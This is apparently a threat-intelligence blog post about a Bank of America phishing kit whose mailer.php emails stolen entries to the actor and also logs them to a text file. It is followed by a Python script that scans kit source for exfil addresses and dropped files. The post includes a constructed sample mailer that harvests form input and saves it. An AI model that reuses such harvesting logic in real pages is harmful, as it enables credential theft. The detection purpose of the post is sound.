Saturday, January 13, 2018

Phishing Kit that writes stolen data to a Text File

This Bank of America phishing kit
https://www.virustotal.com/en/file/c5d63a632c8d6f972d8c598f8f4f8c488199734a73356f2393e20f30bea26955/analysis/1515876239/
contains a file called "mailer.php".

If you look inside, it does the usual thing: it emails the stolen data to the threat actor at trevor.owenus2@gmail.com.


But at the bottom, it also appends every entry to a text file.


So when hunting for phishing websites, it's also occasionally worth looking for text files sitting next to the PHP mailer, as they may actually contain a list of all victims.
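
When triaging a kit archive you already hold, the same check can be done statically. The following is an added example, not code from the kit or from the original post: it scans a PHP mailer's source for the exfil e-mail address and for any local file the script writes or appends to. The sample source, its file names and its address are constructed for illustration, and `analyze_mailer` is a hypothetical helper name.

```python
import re

# Constructed sample resembling the pattern described above (not the kit's actual code).
SAMPLE_MAILER = r'''<?php
$to = "collector@example.invalid";
$message = "User: " . $_POST['u'] . "\n";
mail($to, "New entry", $message);
$fp = fopen("entries.txt", "a");
fwrite($fp, $message);
fclose($fp);
file_put_contents('../logs/backup.log', $message, FILE_APPEND);
$tpl = fopen("template.html", "r");
?>'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# fopen("<path>", "<mode>"): capture the path and the mode string
FOPEN_RE = re.compile(
    r"""fopen\s*\(\s*(['"])(?P<path>[^'"]+)\1\s*,\s*(['"])(?P<mode>[^'"]+)\3""", re.I)
# file_put_contents("<path>", ...): always a write, so the path alone is enough
FPC_RE = re.compile(r"""file_put_contents\s*\(\s*(['"])(?P<path>[^'"]+)\1""", re.I)


def analyze_mailer(php_source):
    """Return exfil e-mail addresses and local files the script writes to."""
    emails = sorted(set(EMAIL_RE.findall(php_source)))
    drops = []
    for m in FOPEN_RE.finditer(php_source):
        mode = m.group("mode").lower()
        # Keep write/append/create modes (a, w, x, c, or any "+" mode); skip read-only.
        if mode[0] in "awxc" or "+" in mode:
            drops.append(m.group("path"))
    drops += [m.group("path") for m in FPC_RE.finditer(php_source)]
    return {
        "uses_mail": bool(re.search(r"\bmail\s*\(", php_source)),
        "emails": emails,
        "drop_files": sorted(set(drops)),
    }


if __name__ == "__main__":
    report = analyze_mailer(SAMPLE_MAILER)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Paths built from variables or concatenation are not resolved by these patterns, so an empty `drop_files` list does not prove the kit keeps no local log.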

